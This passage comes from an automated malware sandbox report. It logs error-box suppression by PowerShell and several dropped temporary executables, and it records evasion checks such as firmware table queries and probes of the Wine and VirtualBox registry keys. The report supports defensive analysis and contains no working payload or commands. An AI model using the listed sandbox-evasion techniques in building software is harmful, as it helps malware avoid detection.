                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-13300
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-9683
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSystem information queried: FirmwareTableInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
